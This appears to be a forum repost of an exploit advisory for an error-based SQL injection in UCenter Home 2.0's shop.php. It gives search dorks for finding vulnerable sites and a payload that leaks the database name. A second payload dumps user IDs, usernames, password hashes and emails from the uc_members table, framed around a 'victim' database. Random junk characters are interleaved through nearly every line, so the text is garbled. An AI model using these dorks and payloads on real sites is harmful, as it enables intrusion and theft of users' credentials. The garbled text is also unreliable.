M; a4 K5 W, q8 q, q4 D( V__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
% r( L" W+ c% f1 E! d' R
0 N, Y8 S) Z! x" V: ^2 |- Z 8 ?* u1 Z e, C! p- j9 C
7 e' [7 u" C. \; g( ?* B* i
*/ Author : KnocKout
- `7 i* C7 Q5 M# I( Q" @8 x$ ?- ^, T% w% p' k
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers ' \; U- b! J, P6 m2 A& r
* a; P+ c! Z/ O- c- M
*/ Contact: knockoutr@msn.com
: ?9 Q. R( J" z( A- u9 f( k
! I5 y$ g' h& m* f; K*/ Cyber-Warrior.org/CWKnocKout
9 Z2 X9 G% C# b; B3 k N' V3 d& O4 y
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 7 I+ b9 m( x. m: i/ q
) e, t" a# W4 L V4 P/ U
Script : UCenter Home
; Z- e( j8 z/ M) a; g+ |8 M) I7 D& a1 v% s+ k' m
Version : 2.0
1 t. d) F9 S- h
6 s; b3 C3 a1 [- O: B& hScript HomePage : http://u.discuz.net/ . `' L9 K9 l4 ^+ U! o
! a3 l7 t9 b& T) M8 n( Y p
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) ?$ p* j, z! u5 [$ F
% P3 X4 z* Q% L' a, EDork : Powered by UCenter inurl:shop.php?ac=view 2 s6 g, Z z, P: H. v" l; E* I
+ r+ Y2 u7 T1 s0 D9 B3 O" I5 yDork 2 : inurl:shop.php?ac=view&shopid= " T; ]& I. j; ?# `2 @ H
/ M" o+ a: Z: x/ y__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
, l/ T4 ? ^, n* `/ P" z6 |, x
1 g2 n- S5 }0 H* [Vuln file : Shop.php ; L: K7 _1 d1 X/ C6 ]. c% @* @9 |
0 L9 ~8 i9 z$ l- b1 Zvalue's : (?)ac=view&shopid=
) u) ~/ l4 ~# N0 x# C+ E) @% n/ s3 e$ O3 ]9 p l; ^2 m! \6 t' h/ X
Vulnerable Style : SQL Injection (MySQL Error Based)
d1 r9 t' ~* O/ ?5 M
* s( e5 ~9 j7 s; |) I+ t# wNeed Metarials : Hex Conversion
! k9 ]# X7 M0 P$ U# u# t$ I: N& c+ `; H
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
+ K7 I3 x/ m' r; U- I5 M# h; Q
4 y- o6 P$ j2 D8 ^& c* kYour Need victim Database name.
9 x) `2 |( A2 c* e* x9 V/ K
0 N$ m1 |. P" jfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
! N! k# k0 N% X+ n# `9 @8 B, g4 l0 g. v/ Y+ I& o* w% N# Y3 K
.. / |' t o& O: `6 x8 |) N- L5 m( L
. a! b6 ?9 T$ V2 s
DB : Okey. % J% E% \7 N- J
+ A9 Z8 Y% X+ ?% Y7 w$ M E+ V
your edit DB `[TARGET DB NAME]` % K' N. Z1 _& E% ]* U: _
8 t- ^, m& I# P Y* ?) `
Example : 'hiwir1_ucenter'
$ k. m5 _$ O# d1 v# Q% t% N7 p4 I) A" O* Z' U6 x b
Edit : Okey. 8 ^9 v2 [( K$ w5 n
; K4 s) @; P2 ?! `4 f) n9 f+ z
Your use Hex conversion. And edit Your SQL Injection Exploit.. - @0 Y; i# {) S; I4 O+ {* ~, l
; C% h' i4 |6 O& s; H5 v: ?
( _; L, o, y& U6 F' {& x
6 M6 w9 Y7 k4 R" lExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 - ]) s# m, m& r5 C; Q1 K) L
|
发表于 2013-2-27 21:31:31
收藏
支持
反对